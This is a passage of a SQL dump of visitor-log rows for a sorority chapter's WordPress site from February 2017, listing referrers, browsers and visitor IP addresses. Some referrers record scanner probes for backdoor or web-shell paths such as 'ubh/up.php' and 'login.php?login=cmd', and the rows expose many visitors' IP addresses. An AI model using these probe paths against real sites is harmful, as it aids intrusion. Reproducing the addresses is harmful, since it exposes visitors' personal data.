.org','MSIE','Windows','7.0','','50.225.39.37','000',1,0),(1053,'2017-02-21','http://zphiblgz.org','MSIE','Windows','11.0','','50.225.39.37','000',1,0),(1054,'2017-02-21','https://www.google.com/','Chrome','Windows','56.0.2924.87','','156.40.216.2','000',3,0),(1055,'2017-02-21','http://zphiblgz.org','Firefox','Windows','40.1','','82.10.176.82','000',1,0),(1056,'2017-02-21','http://hvd-store.com/','Chrome','Linux','37.0.2062.120','','85.248.227.163','000',1,0),(1057,'2017-02-21','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','6.0','','5.61.35.40','000',2,0),(1058,'2017-02-21','http://zphiblgz.org','Firefox','Macintosh','51.0','','173.153.244.7','000',2,0),(1059,'2017-02-21','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','188.226.129.55','000',1,0),(1060,'2017-02-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',6,0),(1061,'2017-02-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(1062,'2017-02-21','http://zphiblgz.org','Firefox','Windows','40.1','','81.180.209.234','000',2,0),(1063,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','45.55.56.22','000',31,0),(1064,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.13.88.176','000',19,0),(1065,'2017-02-21','http://zphiblgz.org','Chrome','Windows','55.0.2883.87','','69.138.175.89','000',7,0),(1066,'2017-02-21','http://zphiblgz.org','Safari','iPhone','10.0','','68.134.178.206','000',7,0),(1067,'2017-02-21','zphiblgz.org','Chrome','Windows','18.6.872.0','','88.198.52.149','000',1,0),(1068,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','23.239.29.232','000',2,0),(1069,'2017-02-21','zphiblgz.org','Chrome','Windows','50.0.2661.75','','162.243.95.76','000',9,0),(1070,'2017-02-21','http://zooekb.ru/','Opera','Unknown','10.54','','185.11.180.67','000',1,0),(1071,'2017-02-21','http://zone-7.net/','Opera','Windows','10.51','','185.11.180.67','000',1,0),(1072,'2017-02-21','http://zphiblgz.org/','Opera','Windows','10.51','','146.185.163.44','000',1,0),(1073,'2017-02-21','http://zphiblgz.org/','Opera','Unknown','10.54','','146.185.163.44','000',1,0),(1074,'2017-02-21','http://zphiblgz.org','Safari','iPad','10.0','','73.173.91.7','000',3,0),(1075,'2017-02-21','http://zphiblgz.org/wp-menu.php','MSIE','Windows','6.0','','5.45.66.28','000',1,0),(1076,'2017-02-21','https://www.google.com/','Chrome','Android','44.0.2403.133','','172.58.168.209','000',1,0),(1077,'2017-02-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','186.202.189.118','000',3,0),(1078,'2017-02-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.253.200.210','000',3,0),(1079,'2017-02-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','188.166.2.203','000',3,0),(1080,'2017-02-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','121.78.145.18','000',1,0),(1081,'2017-02-22','http://zphiblgz.org','Firefox','Windows','40.1','','189.18.143.87','000',2,0),(1082,'2017-02-22','http://zphiblgz.org','Firefox','Windows','50.0','','151.67.65.241','000',1,0),(1083,'2017-02-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.140','000',1,0),(1084,'2017-02-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','156.33.252.37','000',2,0),(1085,'2017-02-22','http://www.google.com/search','Chrome','Linux','27.0.1453','','64.233.172.140','000',1,0),(1086,'2017-02-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(1087,'2017-02-22','http://zphiblgz.org','Safari','iPhone','9.0','','66.87.80.185','000',2,0),(1088,'2017-02-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.30.66','000',1,0),(1089,'2017-02-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(1090,'2017-02-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(1091,'2017-02-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(1092,'2017-02-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',2,0),(1093,'2017-02-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','73.191.86.14','000',7,0),(1094,'2017-02-22','https://www.google.com/','Chrome','Windows','56.0.2924.87','','128.8.35.203','000',10,0),(1095,'2017-02-22','http://zphiblgz.org/xmlrpc-activate.php','Chrome','Windows','42.0.2311.152','','195.154.181.162','000',1,0),(1096,'2017-02-22','http://domznaniy.ru/','MSIE','Windows','6.0','','46.118.233.101','000',2,0),(1097,'2017-02-22','https://www.google.com/','Firefox','Windows','51.0','','23.30.16.198','000',3,0),(1098,'2017-02-22','https://www.facebook.com/','Chrome','Windows','56.0.2924.87','','149.101.1.118','000',7,0),(1099,'2017-02-22','http://zphiblgz.org','Firefox','Windows','40.1','','141.226.172.107','000',2,0),(1100,'2017-02-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','149.101.1.118','000',4,0),(1101,'2017-02-22','https://www.google.com/','Chrome','Windows','56.0.2924.87','','73.56.135.96','000',3,0),(1102,'2017-02-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','173.73.111.170','000',13,0),(1103,'2017-02-22','http://zphiblgz.org','Firefox','Windows','40.1','','89.77.141.164','000',1,0),(1104,'2017-02-22','http://zphiblgz.org','Firefox','Windows','40.1','','177.54.27.8','000',1,0),(1105,'2017-02-22','android-app://com.google.android.googlequicksearchbox','Chrome','Android','50.0.2661.89','','98.233.142.67','000',3,0),(1106,'2017-02-23','https://search.yahoo.com/','Chrome','Windows','56.0.2924.87','','73.207.149.7','000',3,0),(1107,'2017-02-23','http://zphiblgz.org','Firefox','Windows','29.0','','177.38.236.148','000',2,0),(1108,'2017-02-23','http://zphiblgz.org','Safari','iPhone','10.0','','74.96.84.126','000',2,0),(1109,'2017-02-23','http://zphiblgz.org','Firefox','Windows','34.0','','185.159.36.6','000',22,0),(1110,'2017-02-23','http://zphiblgz.org','Firefox','Windows','40.1','','39.48.53.139','000',2,0),(1111,'2017-02-23','http://zphiblgz.org/download/logo_img.php','Chrome','Windows','42.0.2311.152','','195.154.181.15','000',1,0),(1112,'2017-02-23','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','37.48.120.196','000',2,0),(1113,'2017-02-23','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.80.169','000',2,0),(1114,'2017-02-23','http://www.zphibmaryland.org/chapters/','Chrome','Android','56.0.2924.87','','23.30.27.209','000',2,0),(1115,'2017-02-23','https://www.facebook.com/','Chrome','Windows','56.0.2924.87','','108.56.184.93','000',3,0),(1116,'2017-02-23','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(1117,'2017-02-23','http://zphiblgz.org','Firefox','Windows','40.1','','103.5.113.9','000',2,0),(1118,'2017-02-23','http://zphiblgz.org','Firefox','Windows','32.0','','217.16.187.32','000',2,0),(1119,'2017-02-23','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','50.225.39.86','000',5,0),(1120,'2017-02-23','http://zphiblgz.org','Firefox','Windows','51.0','','50.225.39.86','000',10,0),(1121,'2017-02-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(1122,'2017-02-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(1123,'2017-02-23','http://zphiblgz.org/wp-includes/logo_img.php','Chrome','Windows','42.0.2311.152','','62.210.162.209','000',1,0),(1124,'2017-02-23','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','56.0.2924.87','','96.91.252.145','000',3,0),(1125,'2017-02-23','android-app://com.google.android.googlequicksearchbox/https/www.google.com','Chrome','Android','55.0.2883.91','','96.255.162.155','000',9,0),(1126,'2017-02-23','http://zphiblgz.org','MSIE','Windows','11.0','','158.74.35.10','000',1,0),(1127,'2017-02-23','http://zphiblgz.org','Microsoft-WebDAV-MiniRedir','Unknown','6.1.7601','','158.74.35.10','000',11,0),(1128,'2017-02-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','67.205.38.113','000',16,0),(1129,'2017-02-23','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','204.126.132.241','000',7,0),(1130,'2017-02-23','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','174.204.17.5','000',3,0),(1131,'2017-02-23','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','69.143.32.105','000',3,0),(1132,'2017-02-23','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.35.40','000',1,0),(1133,'2017-02-23','http://zphiblgz.org/wp-admin/','MSIE','Windows','8.0','','5.61.35.40','000',1,0),(1134,'2017-02-23','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','96.244.146.123','000',2,0),(1135,'2017-02-23','http://zphiblgz.org','Safari','iPhone','8.0','','174.205.12.39','000',2,0),(1136,'2017-02-23','https://www.google.com/','Chrome','Windows','56.0.2924.87','','98.218.44.186','000',2,0),(1137,'2017-02-23','http://zphiblgz.org','MSIE','Windows','11.0','','173.224.161.129','000',2,0),(1138,'2017-02-23','http://zphiblgz.org','MSIE','Windows','10.0','','208.83.136.178','000',1,0),(1139,'2017-02-23','https://www.google.com/','Chrome','Windows','56.0.2924.87','','169.226.242.227','000',1,0),(1140,'2017-02-23','http://zphiblgz.org','Chrome','iPad','56.0.2924.79','','69.255.214.200','000',3,0),(1141,'2017-02-23','http://www.baidu.com/s?wd=Home-LambdaGammaZeta%3ALambdaGammaZeta','Chrome','Windows','36.0.1985.143','','61.135.190.105','000',1,0),(1142,'2017-02-23','http://m.baidu.com/s?wd=Home-LambdaGammaZeta%3ALambdaGammaZeta','Safari','iPhone','5.1','','61.135.190.105','000',1,0),(1143,'2017-02-23','http://zphiblgz.org','Firefox','Windows','40.1','','177.11.116.16','000',2,0),(1144,'2017-02-24','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','68.64.168.22','000',2,0),(1145,'2017-02-24','http://zphiblgz.org','Firefox','Windows','34.0','','185.159.36.6','000',24,0),(1146,'2017-02-24','http://pizza-imperia.com/','Chrome','Linux','37.0.2062.120','','37.187.7.74','000',1,0),(1147,'2017-02-24','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','195.154.122.54','000',1,0),(1148,'2017-02-24','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','217.170.201.106','000',1,0),(1149,'2017-02-24','http://hundejo.com/','Chrome','Linux','37.0.2062.120','','192.36.27.7','000',1,0),(1150,'2017-02-24','http://zphiblgz.org','Firefox','Windows','40.1','','85.106.101.255','000',1,0),(1151,'2017-02-24','http://zphiblgz.org','Firefox','Windows','29.0','','177.126.89.34','000',2,0),(1152,'2017-02-24','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','78.109.23.1','000',1,0),(1153,'2017-02-24','http://zphiblgz.org','MSIE','Windows','11.0','','214.36.0.135','000',9,0),(1154,'2017-02-24','https://www.facebook.com/','Firefox','Windows','51.0','','63.88.62.157','000',8,0),(1155,'2017-02-24','http://m.facebook.com','AppleWebKit','iPhone','602.3.12','','172.56.3.250','000',3,0),(1156,'2017-02-24','http://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(1157,'2017-02-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','69.63.164.98','000',3,0),(1158,'2017-02-24','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',2,0),(1159,'2017-02-24','http://www.google.com/search','Chrome','Linux','27.0.1453','','64.233.172.142','000',1,0),(1160,'2017-02-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','38.124.154.98','000',1,0),(1161,'2017-02-24','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwi0vY-gn6nSAhVkwFQKHc8oDLoQFgg3MAU&url=http%3A%2F%2Fzphiblgz.org%2Fmembers%2F&usg=AFQjCNFgZbtoqBvluWLy-IlewLRqAI444g','MSIE','Windows','11.0','','65.202.241.247','000',1,0),(1162,'2017-02-24','http://zphiblgz.org','Firefox','Windows','40.1','','185.171.62.31','000',2,0),(1163,'2017-02-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','166.102.136.28','000',1,0),(1164,'2017-02-24','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.73.218','000',1,0),(1165,'2017-02-24','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','96.234.210.16','000',4,0),(1166,'2017-02-24','http://zphiblgz.org','MSIE','Windows','6.0','','38.81.65.42','000',1,0),(1167,'2017-02-24','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.81','000',9,0),(1168,'2017-02-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','23.30.31.122','000',3,0),(1169,'2017-02-24','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','37.123.133.148','000',1,0),(1170,'2017-02-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(1171,'2017-02-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(1172,'2017-02-24','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.94','000',9,0),(1173,'2017-02-24','android-app://com.google.android.googlequicksearchbox','Chrome','Android','56.0.2924.87','','66.250.191.192','000',2,0),(1174,'2017-02-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.214.169.247','000',5,0),(1175,'2017-02-24','http://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',2,0),(1176,'2017-02-24','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','208.76.113.3','000',1,0),(1177,'2017-02-24','http://zphiblgz.org','Chrome','Android','34.0.1847.76','','172.58.200.121','000',3,0),(1178,'2017-02-24','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','62.210.162.209','000',1,0),(1179,'2017-02-24','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.3.137','000',3,0),(1180,'2017-02-24','http://zphiblgz.org','Firefox','Windows','51.0','','50.225.39.86','000',6,0),(1181,'2017-02-24','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','64.120.30.154','000',1,0),(1182,'2017-02-24','http://zphiblgz.org','LinkedInBot','Unknown','1.0','','108.174.5.115','000',1,0),(1183,'2017-02-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','120.76.121.20','000',2,0),(1184,'2017-02-24','http://zphiblgz.org','Safari','iPad','10.0','','71.121.204.212','000',4,0),(1185,'2017-02-24','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','108.15.31.213','000',3,0),(1186,'2017-02-24','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.130.173','000',1,0),(1187,'2017-02-24','https://www.google.com/','Chrome','Windows','56.0.2924.87','','129.2.58.84','000',7,0),(1188,'2017-02-24','http://zphiblgz.org','Safari','iPhone','10.0','','69.137.40.172','000',4,0),(1189,'2017-02-24','https://www.google.com/','Safari','Macintosh','10.0.3','','73.135.240.26','000',1,0),(1190,'2017-02-25','http://zphiblgz.org','Firefox','Windows','34.0','','185.159.36.6','000',20,0),(1191,'2017-02-25','https://m.facebook.com/','Chrome','Android','56.0.2924.87','','96.244.197.251','000',3,0),(1192,'2017-02-25','http://zphiblgz.org','Safari','Macintosh','5.1','','5.9.145.132','000',1,0),(1193,'2017-02-25','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','173.239.197.11','000',5,0),(1194,'2017-02-25','https://www.google.com/','Firefox','Windows','51.0','','98.204.240.196','000',1,0),(1195,'2017-02-25','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','68.64.168.22','000',2,0),(1196,'2017-02-25','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.121','000',1,0),(1197,'2017-02-25','http://zphiblgz.org','Firefox','Windows','40.1','','118.137.162.77','000',2,0),(1198,'2017-02-25','http://m.facebook.com/','Chrome','Android','53.0.2785.124','','174.205.10.236','000',2,0),(1199,'2017-02-25','http://zphiblgz.org','Firefox','Windows','40.1','','178.23.88.153','000',1,0),(1200,'2017-02-25','http://www.google.com/','Chrome','Android','56.0.2924.87','','174.204.28.171','000',2,0),(1201,'2017-02-25','http://zphiblgz.org','MSIE','Windows','11.0','','173.208.244.98','000',1,0),(1202,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','66.87.81.213','000',4,0),(1203,'2017-02-25','http://zphiblgz.org','Safari','iPhone','10.0','','96.255.12.83','000',1,0),(1204,'2017-02-25','https://www.facebook.com/','Chrome','Windows','56.0.2924.87','','73.87.78.78','000',6,0),(1205,'2017-02-25','https://ca.search.yahoo.com/','Chrome','Windows','56.0.2924.87','','99.237.97.23','000',1,0),(1206,'2017-02-25','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.204.19.96','000',1,0),(1207,'2017-02-25','http://m.facebook.com/','Chrome','Android','48.0.2564.106','','66.87.80.159','000',11,0),(1208,'2017-02-25','http://zphiblgz.org','Firefox','Windows','40.1','','89.201.136.207','000',1,0),(1209,'2017-02-25','http://zphiblgz.org','Chrome','Android','55.0.2883.91','','174.204.19.96','000',1,0),(1210,'2017-02-25','http://www.bing.com/search?FORM=U157GD&PC=U157G&q=zeta+phi+beta+howard+county','Chrome','Windows','56.0.2924.87','','69.250.56.36','000',6,0),(1211,'2017-02-25','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',8,0),(1212,'2017-02-25','http://m.facebook.com/','Chrome','Android','52.0.2743.98','','172.58.185.77','000',2,0),(1213,'2017-02-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(1214,'2017-02-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(1215,'2017-02-25','http://zphiblgz.org','Firefox','Windows','29.0','','201.200.24.166','000',2,0),(1216,'2017-02-25','http://zphiblgz.org','Chrome','Android','34.0.1847.76','','172.58.224.133','000',3,0),(1217,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','108.31.246.198','000',3,0),(1218,'2017-02-25','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.143.140.209','000',2,0),(1219,'2017-02-25','http://zphiblgz.org','Safari','iPhone','10.0','','174.204.15.82','000',5,0),(1220,'2017-02-25','http://zphiblgz.org','Firefox','Windows','29.0','','178.234.35.99','000',2,0),(1221,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','71.178.49.187','000',1,0),(1222,'2017-02-25','http://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','174.205.16.61','000',2,0),(1223,'2017-02-25','http://zphiblgz.org','Chrome','Android','54.0.2840.85','','174.205.16.61','000',3,0),(1224,'2017-02-25','http://zphiblgz.org','Chrome','Android','52.0.2743.98','','174.205.11.235','000',2,0),(1225,'2017-02-25','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','71.244.250.154','000',1,0),(1226,'2017-02-25','https://www.google.com/','Chrome','Windows','56.0.2924.87','','184.88.66.126','000',1,0),(1227,'2017-02-25','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(1228,'2017-02-25','http://zphiblgz.org','Safari','iPhone','10.0','','68.84.0.132','000',4,0),(1229,'2017-02-25','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','195.154.181.15','000',1,0),(1230,'2017-02-25','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','198.12.108.56','000',1,0),(1231,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','166.216.165.98','000',2,0),(1232,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','68.134.114.101','000',1,0),(1233,'2017-02-25','https://www.google.com/','Chrome','Android','47.0.2526.83','','166.137.244.90','000',8,0),(1234,'2017-02-25','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.81.55','000',2,0),(1235,'2017-02-25','http://zphiblgz.org','Safari','iPhone','10.0','','166.137.244.117','000',1,0),(1236,'2017-02-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','51.255.88.165','000',1,0),(1237,'2017-02-25','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','96.255.99.186','000',3,0),(1238,'2017-02-25','http://zphiblgz.org','Chrome','Android','52.0.2743.98','','71.179.15.166','000',1,0),(1239,'2017-02-25','https://www.google.com/','Chrome','Macintosh','56.0.2924.87','','165.230.224.34','000',1,0),(1240,'2017-02-25','https://www.google.com/','Chrome','Android','44.0.2403.133','','98.233.232.84','000',6,0),(1241,'2017-02-25','http://m.facebook.com/','Chrome','Android','56.0.2924.87','','172.58.185.90','000',2,0),(1242,'2017-02-25','http://m.facebook.com/','Chrome','Android','56.0.2924.87','','166.137.244.92','000',2,0),(1243,'2017-02-26','http://zphiblgz.org','Firefox','Windows','34.0','','185.159.36.6','000',7,0),(1244,'2017-02-26','http://hundejo.com/','Chrome','Linux','37.0.2062.120','','93.115.95.206','000',1,0),(1245,'2017-02-26','http://zphiblgz.org','Firefox','Windows','40.1','','123.136.111.141','000',2,0),(1246,'2017-02-26','http://zphiblgz.org','MSIE','Windows','7.0','','34.198.240.56','000',2,0),(1247,'2017-02-26','http://zphiblgz.org/','Safari','iPhone','10.0','','66.87.81.132','000',1,0),(1248,'2017-02-26','http://zphiblgz.org','Chrome','Windows','10.0.649.0','','91.121.79.180','000',2,0),(1249,'2017-02-26','http://ZPHIBLGZ.ORG/','Chrome','Windows','48.0.2564.97','','146.185.223.146','000',1,0),(1250,'2017-02-26','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(1251,'2017-02-26','http://r.search.yahoo.com/_ylt=AwrEWDY72rJYC08AW_Fx.9w4;_ylu=X3oDMTE0dW1qc2s1BGNvbG8DYmYxBHBvcwMxBHZ0aWQDVUkyRkJUMl8xBHNlYwNzcg--/RV=2/RE=1488145083/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=0/RS=qdlWWU4fbszvW3t69eWtESZ36hE-','Safari','iPhone','10.0','','71.163.184.16','000',1,0),(1252,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.185.206.85','000',8,0),(1253,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.103','000',5,0),(1254,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.49.14.108','000',1,0),(1255,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.155.2','000',1,0),(1256,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','67.205.11.6','000',1,0),(1257,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.96.93.97','000',1,0),(1258,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.147.145','000',1,0),(1259,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','64.90.34.103','000',1,0),(1260,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','166.62.32.235','000',1,0),(1261,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.209.189.10','000',1,0),(1262,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','89.253.223.206','000',1,0),(1263,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.238.94.163','000',1,0),(1264,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','162.242.219.26','000',1,0),(1265,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.10.105.47','000',1,0),(1266,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','46.16.188.14','000',1,0),(1267,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','176.223.207.124','000',1,0),(1268,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.109.52.196','000',1,0),(1269,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','173.236.157.94','000',1,0),(1270,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','54.174.195.70','000',1,0),(1271,'2017-02-26','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.141','000',2,0),(1272,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','199.195.118.194','000',1,0),(1273,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','59.125.119.188','000',1,0),(1274,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','85.94.209.130','000',1,0),(1275,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.142.252.26','000',1,0),(1276,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','91.134.248.253','000',1,0),(1277,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','199.167.16.249','000',1,0),(1278,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','132.148.27.124','000',1,0),(1279,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','198.1.88.28','000',1,0),(1280,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.131.94.96','000',1,0),(1281,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','67.205.17.92','000',1,0),(1282,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','66.201.99.96','000',1,0),(1283,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','216.129.207.176','000',1,0),(1284,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','166.62.94.44','000',1,0),(1285,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.189.32.3','000',1,0),(1286,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','92.51.145.173','000',2,0),(1287,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','94.23.37.210','000',1,0),(1288,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','186.193.225.80','000',1,0),(1289,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.11.240.169','000',1,0),(1290,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.221.221.166','000',1,0),(1291,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','101.0.76.160','000',1,0),(1292,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.35.28.95','000',1,0),(1293,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.37.8.109','000',1,0),(1294,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','103.251.134.14','000',1,0),(1295,'2017-02-26','http://zphiblgz.org','Safari','iPhone','10.0','','50.164.59.70','000',3,0),(1296,'2017-02-26','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','69.143.140.209','000',1,0),(1297,'2017-02-26','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(1298,'2017-02-26','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','96.255.162.155','000',1,0),(1299,'2017-02-26','http://zphiblgz.org','MSIE','Windows','7.0','','96.255.162.155','000',2,0),(1300,'2017-02-26','http://zphiblgz.org','Edge','Windows','14.14393','','96.255.162.155','000',4,0),(1301,'2017-02-26','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','73.133.177.68','000',6,0),(1302,'2017-02-26','http://zphiblgz.org','Safari','Macintosh','9.1.3','','68.134.120.81','000',4,0),(1303,'2017-02-26','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','173.69.144.23','000',2,0),(1304,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','95.240.225.67','000',1,0),(1305,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','193.138.88.19','000',3,0),(1306,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.33.116.38','000',3,0),(1307,'2017-02-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.245.89.125','000',7,0),(1308,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.64.179.194','000',1,0),(1309,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','50.116.111.13','000',1,0),(1310,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.55.208.37','000',1,0),(1311,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.30.98.17','000',1,0),(1312,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','104.238.81.184','000',1,0),(1313,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','69.163.161.197','000',1,0),(1314,'2017-02-26','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','178.210.90.90','000',1,0),(1315,'2017-02-26','http://zphiblgz.org